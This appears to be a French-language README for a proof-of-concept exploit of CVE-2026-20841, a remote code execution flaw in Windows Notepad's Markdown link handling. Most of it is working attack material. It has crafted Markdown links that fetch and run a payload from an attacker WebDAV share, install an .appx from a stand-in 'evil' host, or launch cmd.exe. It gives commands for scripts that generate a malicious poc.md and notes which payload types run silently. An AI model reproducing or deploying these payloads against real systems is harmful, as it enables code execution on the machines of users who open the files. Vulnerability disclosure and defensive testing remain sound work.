
Preuve de concept pour CVE-2026-20841, une RCE de Windows Notepad via des liens markdown. Génère des fichiers .md conçus pour déclencher des charges utiles distantes, le sideloading d'applications ou l'exécution de binaires locaux.
PoC pour une faille d'exécution de code à distance dans le moteur de rendu Markdown du Bloc-notes Windows. Le moteur Markdown ne restreint pas les protocoles d'URL, permettant de déclencher des gestionnaires de protocoles arbitraires via des liens cliquables.
file:///)[click](file:///\\attacker@5005\DavWWWRoot\payload.py)
Le protocole résout les chemins UNC distants. Liez une charge utile et Windows la récupérera et l'exécutera au clic.
file:///ms-appinstaller://)[click](ms-appinstaller://?source=https://evil/xxx.appx)
Ouvre l'Installateur d'applications avec un package .appx/.msix fourni par l'attaquant.
file://)[click](file://C:/windows/system32/cmd.exe)
Lance n'importe quel exécutable déjà présent sur le disque — cmd.exe, powershell.exe, mshta.exe, etc.
Les deux scripts génèrent un fichier poc.md avec un lien conçu dans le répertoire courant.
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
# exemple
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md
Testez les charges utiles dans payloads/.
.exe, .lnk, .vbs et similaires déclenchent un avertissement de sécurité Windows indépendamment du comportement du Bloc-notes..py et .jar s'exécutent silencieusement si Python ou Java est installé sur la cible.Restez en sécurité !